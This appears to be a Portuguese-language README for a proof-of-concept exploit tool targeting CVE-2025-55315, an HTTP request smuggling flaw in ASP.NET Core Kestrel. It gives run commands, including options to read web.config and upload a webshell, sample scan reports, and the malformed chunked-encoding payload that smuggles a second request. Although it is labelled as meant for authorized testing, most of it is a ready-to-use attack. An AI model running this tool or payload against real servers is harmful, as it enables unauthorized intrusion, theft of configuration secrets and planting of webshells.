
Exploit de PoC do CVE-2025-55315
Ferramenta de Exploração de Contrabando de Requisições HTTP para ASP.NET Core Kestrel
ESTA FERRAMENTA É APENAS PARA TESTES DE SEGURANÇA AUTORIZADOS!
Ferramenta profissional de teste de penetração para CVE-2025-55315 (vulnerabilidade de contrabando de requisições HTTP no ASP.NET Core Kestrel). Esta ferramenta foi projetada para análise de alvo único com capacidades abrangentes de exploração.
Uma vulnerabilidade crítica de contrabando de requisições HTTP no servidor web ASP.NET Core Kestrel (CVSS 9.9/10) que permite que atacantes:
Versões Afetadas:
# Python 3.7 or higher
python3 --version
# No external dependencies - uses only standard library
# Clone or download the tool
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit
# Make executable
chmod +x cve_2025_55315_PoC.py
python3 cve_2025_55315_PoC.py -t target.com
Isso irá:
python3 cve_2025_55315_PoC.py -t target.com -e /api/login
python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt
python3 cve_2025_55315_PoC.py \
-t target.com \
--read-config \
--upload-shell \
-v \
-o full_report.txt
Cenário: Verificar se o servidor de produção está vulnerável
python3 cve_2025_55315_PoC.py -t api.mycompany.com
Duração Esperada: 30-60 segundos
Cenário: Verificação abrangente de endpoints com saída verbosa
python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt
Duração Esperada: 2-5 minutos
Cenário: Testar endpoints críticos específicos
python3 cve_2025_55315_PoC.py \
-t api.mycompany.com \
-e /api/payment/process \
-e /api/admin/users \
-e /api/internal/config \
-o critical_endpoints.txt
Cenário: Testar servidor HTTP interno
python3 cve_2025_55315_PoC.py \
-t internal-api.local \
-p 8080 \
--no-ssl
usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
[--no-ssl] [--read-config] [--upload-shell]
[-o OUTPUT] [-v] [--timeout TIMEOUT]
Required Arguments:
-t, --target Target hostname or URL (e.g., target.com)
Optional Arguments:
-p, --port Port number (default: 443 for SSL, 80 for non-SSL)
-e, --endpoint Specific endpoint(s) to test (can be used multiple times)
--no-ssl Disable SSL/HTTPS (use HTTP)
--read-config Attempt to read web.config file
--upload-shell Attempt webshell upload (requires confirmation)
-o, --output Save report to file
-v, --verbose Enable verbose output
--timeout Socket timeout in seconds (default: 10)
-h, --help Show help message
Target: old-api.company.com:443
Vulnerable: YES - CRITICAL
--- Server Information ---
server: Kestrel/8.0.15
kestrel_detected: True
http_version: 1.1
--- VULNERABLE ENDPOINTS (2) ---
✗ /api/login
Details: Request smuggling successful - multiple responses
✗ /api/health
Details: Request smuggling successful - multiple responses
--- SUCCESSFUL EXPLOITS ---
✓ web.config_read via /api/login
Interpretação:
Target: new-api.company.com:443
Vulnerable: NO - SECURE
--- Server Information ---
server: Kestrel/9.0.10
kestrel_detected: True
http_version: 1.1
[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)
✓ No vulnerable endpoints found - target may be patched
Interpretação:
Antes de executar esta ferramenta, certifique-se de que:
A ferramenta explora a CVE-2025-55315 usando codificação de transferência em blocos (chunked) malformada:
POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
2;\n ← VULNERABILITY: Lone \n instead of \r\n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1 ← This becomes a separate request
Host: target.com